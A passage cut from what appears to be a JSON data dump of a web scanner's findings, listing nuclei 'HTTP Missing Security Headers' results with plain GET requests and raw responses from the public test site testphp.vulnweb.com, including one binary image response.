"http://testphp.vulnweb.com/pictures/1.jpg.tn", + "discovered_date": "2024-11-13T02:42:17.166Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/1.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4355\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-1103"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0002\u0003\u0001\u0006\u0001\u0005\u0003\u0004\u0007\u0002��4\u0010\u0002\u0001\u0003\u0004\u0001\u0003\u0003\u0003\u0003\u0004\u0001\u0005\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0006\u0013Q"a�\u0014q�2��#BR��\u0016b�����\u0019\u0001\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005��)\u0011\u0002\u0002\u0001\u0003\u0002\u0005\u0004\u0003\u0001\u0002\u0003\u0011\u0004!1\u0012A\u0005\u0013Q��2aq�"3���\f\u0003\u0001\u0002\u0011\u0003\u0011?�>��n?�����8ԝB�w\u0018Va�9������]��.�H�n\t ��r2s�\u0006��P\u0003z��8��j�����\u0006$}#����W\t��������{��c ʸʮ<����׹Er�\n/�I���j�&���dY\u0019@�W��#�r>�Ϛ��lN^}�\u0015�#3(|g�p0rpO��f��}%%�\u0006kIE�f�\u0010�\u0003��\u0007\u001f��\u0006�zf��^�C%Ƕ�\u0019\u00140;C\u001d�\u0018�?���z�\\\\[��\u00025�y.\\�\u00169۟�8\u001fڮ�?�\u0019L3\\���\u0019#\u00110�\\x��8�#�\u001b�Z\u0015Ʃ|�\u001e5 夑�����դ�=>�\u001bI�i�;�����\n2\u0006\u0007۳�O^(����b�P�.��_fEUR\u0002}9��r6����>j�g�$g�\u0017$�\u000e�{��[�L���9�,sXi&\u0014y���T�b*E\u0014VH��퍌�I,���E��0\u0007\u0007���?�\u0015�;��\u0017]�J�X��Fd���������$`c��2�0գ�7\u0016�nח"ј;2�����p;'9\u0018�z�\u0014�/����[)�3Z�orEY\f�\u001e|\u0011�q�|\u001e��a\u001e�u$-\u000bJ�\u001f;��p����\u0001�T���"�M��1�06�ۉ\u0001O�g\u001c���N�>����,�]�%ܰ��H\u0010s�O������\u0015S�z�i�%�@��@G�\u0007`,@#'�C����Z���:��l\u0004�X�X������.\u0014�A�U�\\6i\nٱ��-~"2ƂDP��`�\u0003�\u0001��V׿\u0015\u0014$�m��Isr�0Uf��\u0014\u0003��.�sq���g���]�8\u001fj�\u0006��b�/,�\u001e��]B\u0015"��\nS�p��>3�\\S����q�6�RI[\u000258��\u000b�;�\u001d����L�����<bDxAiJ�&�n8\u000b�\u0007���' f��C����,jR\u0018�\u0015Oǎ\u0007\u0003�:���+\u001fO�b��\u0017z��F\u0014�\u000bI\u0003,b1�S#$\u00022\t�3�q�� ^\u0016$�'��\u001e�ԭ�-೾�i���*��\u0013g\u00039##����5��?L�H�D��O�Iw�S}D��\r�pz��\u0010�A�K����\u001a�a�to�^���v�~�1���<�\u000f�U\\Zl�h�%�\u001e񊫊o4�暮�KD��S��a�,�"�r\\\u0004\u001f�T\u001f<\f���\u001aV�K��'�*qEn��\u0014b��(�Վ\f�\u0018�3�g\u0015Ҵ�\u001d,\\$�E���}��\u00021�O\u001d�ۏ���\u0004]'G����x!wH�\u0007j��|����f�\u0017����\u0004wz\\x\u0018B���\u0014dy��G��-��r���>L�MR�!���Kh�$&]�I�\u0002\n�s��?ǐ+�kz5����=�R�\u0007!b�NJ�\u001b�\u001dq�s�8\u00184�t�m���\u00067�wb�\t`���{\u0001����I��\u001e��\u000f�9�,c�����q�$\u0003�\u001dW.�R�\nO+��4�\u0017\b��\u0018�r.\rx���!\u0014�;=U�iw6:��Ȼ�\u0019L{�K#\u0010q��`�:6\u000eFA\u001eE8zwVKM6In�nj2�]Ý���Dn8�>Oc5\u0018K`�:��v�|Q�^\u0018/\u00034�$\n�\u0007\u0005�\f\u001bpny�<\u001a痷r\\\\<�9wc��&�k[��\u0006Q"�ޥ\\0��u��\u001e\b�Wf�\u001cD\u0005���Oep�[?�(���~����yđ�wl�Vf6��+����?�s���)\u0017LA-�1�<��&��\u0019��\u0001��8ìZ�@�~�\f�!̲�k���/dp{㓎�\t�%��a�\u001d6\u001d2���0̒��G\u0004��C\u0002\u0001� �>|��t�:E��Q�\u000b\u001a���6�L\f�$�\u0007\u0007�y�)�H���{\u0010�H6)�\u000fy\u0004�`�)\u0003h�����{�r(�#���RA)�\u001cřd���o\u0001p-�<��x.��O\f�e���(�/z��ؘ��wq\u000e"���F\u0006>��|�r\t\u0002��4��O��sfR~�]�t\b��?a��:w�4x�.\f���!V}�˲��;\u001c��\u0006G\u001d\u000e�k\u0016���jV�]�JZ(�%L�\u0001\t�r<a8�?�B��+�ㇷs4� i~�7�t���d\u0019\u0018�\b�x+�'\u0019?P��\u001e2E%ݻ[L�9R��ӑ�>z|�5\u000bq�\u000bKkt@[q+�\u000e�\u0004\u0003�􁜌��y4�:\u0016bO&�knK,ViԨɬ�>z5�S�)�\u0002�@���X㳑�\t\u0016P�\u0007,��\u001f���M�庂�&�$�\t�r\u0007A�\u0012r8�����S�\\Igw\u0015�\r�H��8�4æIst�\u000f#���,��\u0007��+��U��/^�'��Y���'�h\u001c�\u0019�X��H'�v9�`�x�\r^oOI,m\u0014L���u\u000b�-���1����\u0018,:��jz}�\u0007�)\u0019�\u001aC�\u0002O��$���ƥo4A^DuG��*@lw������\te�m��2e\u001d��f#\u001d��j�\u0019�\u0015�*���#\u0019�\u001a�\u0004+�YZy\u001a\u0015��1�$)<\u0003��5"�c&�'4f�4S��k=��o4r�p����\u000e\b��ׯJpj��\u0006�L�w�\u0007�e0��Vy\u0002`g�����'�N����u�V��,��7��'���\u0015=tx��iV�RM>�$Aj��G�I!�\u0010U�…\u0003\u0019�$\u001e���*�mF{۝�;I+vO%���4��6y�\b<\u000f����ԯ�!�b�$��x���?���U�Ko��q���@���\u0016f\\*㑜\u0001���I�4��i��IyܤQ��Ҿ��X`\u0005’A�'\u0004`.y��/�]���������:��6��\u001f�g\b��4i-�z:�\u0011gP��Q�0�\u0011��i���'���dG[�\u001c�\u001fO8a�\u0006F\b�{��t}D���5\b��0!��\u0012�\f9\u001d���2s�5�u\r>�loo��]\u001cY���+.v�>��(@�\u0001 \u0013�L'�t��9Y��Ts��5�5l�\u000b�"m�\u001c���p���L\f��5�o48�NE;U%��,��m\u0007h�'�@�y\u0002�}R ��-���\n�pO\u001f�5�U��h��\u0015��X���N>��㑭g\u001704�!V�����\u001fW�O�\u0007��\u000bk\t\u0007���%[Y�C\u0012��A]Č\u0010A�G�]\u001a����\u001eL��Y�9�cX��I!��VF#*\u0003.\u00187\u001fP<�\t�<�Ց�I}$�"��v��\n��>�x�d���\r�\u001f��M�u�}+�\b \u001f�\u0003���\u0019M�'��Y#�f%[�[�>j��6�\u0007,4�y\u001elVh�Y-��H��\u0019��d��c����\u0003A4~夤{������}�^�ۊ�Y\u0011\u001c��\u0005\u0015��\u0014\n��p\u0013S�E\u0015D\u0003�bO<��\u001b�0e8 �V1R*ѐ\u0006���.�m\u0004�Os ���s�6H]��`����3U\u000b1' �x⽣\u001c��%���?W�g�2�"F�#�����\u0003�'��O4v�i�1\u0012_N��=�\u0006��\u0004p>9?\u001d�+���Moq\u001c�\u0001d`ps��W\u0010����sp=ûs�O?��?���Dlk+op�t��Ew�Z_��ݐ�`VN\u001c�[ \f�\u0015�x��rMd�ZD~��3%�O�4�7>�3�\u0007�dc\u0019$p<Ҷ����xgc��xQ�\u0001�4Ţ�q������p#Q�?[s�\u001cu��k�zkj�:^%�v\u0019I7��U�"�{�ɍF��BeKd}\u0001�F@a���\u0003����ۙIPpA��NWZ�\u0017��\u0015U}�m��\u0004���H\r�Ć\u0004s�?��Wv*\u0016K�ܬ,#۵]���9;A\u0003�9.y'�ZuҩF\u001a����3�x34�(���C\u0004;�\b�`%m��\u0001���#?I\f�x2��\u0002=�\u0018�\u0005?$\u001c���x,e�BM\u0019u_i�\u001fKl�>\u0006_�� \u000f��]&����H�Ssl�tI&0�7\u0001���:\u001eǒ9\u0015\u001d.��3�M���C(���Lѣ}>v��*�1��>�\u0007\u0018$�0r\t�~�i\u001d��ΰF�2��񗍷3`+\u0012�\u0018��\u0001�H�HQ��ʉmqs��gEf�-��\u0007gh*3�2�\u001b\u0003��q�5����M�2-�˔"Ux�,Y��v\n��\u001c\u000e2AbR��6�J���=���[�7�\u0014Q]�\u000f\u0014T�*�\f(��t\u0002EM@�\u0015D\u0002jS��Ed�I���32���b=\u001a�\u001a\u001cV�)���\u0001�\t?�o۱\u0015\u001a5���XZU�p$3\u001e8\u001f�\\�\u0002x�Y����12��\u0003r�?��Գ��8=ؼ�Ք�e9\u0004v*���,\u0011f�����8l6d!rz\u0019$*��\u0001�+oC���޳J�y\u0002'��(9w��\u0007�\u001f��\u0004�[S�\u0016{d���tL^!�\u0014ۺ �;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 876, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36' 'http://testphp.vulnweb.com/admin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/admin", + "discovered_date": "2024-11-13T02:42:17.379Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /admin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_6_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:35 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /admin/</title></head>\r\n<body>\r\n<h1>Index of /admin/</h1><hr><pre><a href="../">../</a>\r\n<a href="create.sql">create.sql</a> 11-May-2011 10:27 523\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 877, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/A01", + "discovered_date": "2024-11-13T02:42:17.568Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 878, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2", + "discovered_date": "2024-11-13T02:42:17.746Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 879, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "referrer-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop", + "discovered_date": "2024-11-13T02:42:17.932Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<html>\r\n<div id="content">\r\n\t<div class='product'><table><tr><td width='180px'><img src='images/1.jpg'></td><td width='400px'><a href='Details/network-attached-storage-dlink/1/'>Network Storage D-Link DNS-313 enclosure 1 x SATA</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/network-attached-storage-dlink/1/'>Price<br>359 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/2.jpg'></td><td width='400px'><a href='Details/web-camera-a4tech/2/'>Web Camera A4Tech PK-335E</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/web-camera-a4tech/2/'>Price<br>10 &euro;</a></td></table></tr></div><div class='product'><table><tr><td width='180px'><img src='images/3.jpg'></td><td width='400px'><a href='Details/color-printer/3/'>Laser Color Printer HP LaserJet M551dn, A4</a></td><td width='50px' bgcolor='#F8F8F8'><a href='Details/color-printer/3/'>Price<br>812 &euro;</a></td></table></tr></div></div>\r\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 880, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36' 'http://testphp.vulnweb.com/cgi-bin/status'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin/status", + "discovered_date": "2024-11-13T02:42:18.122Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin/status HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4861.152 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 881, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3", + "discovered_date": "2024-11-13T02:42:18.297Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 882, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/color-printer/3", + "discovered_date": "2024-11-13T02:42:18.474Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/color-printer/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 883, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1/A01", + "discovered_date": "2024-11-13T02:42:18.659Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-1/A01 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Edg/116.0.1938.54\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Network Storage D-Link DNS-313 enclosure 1 x SATA</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 884, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 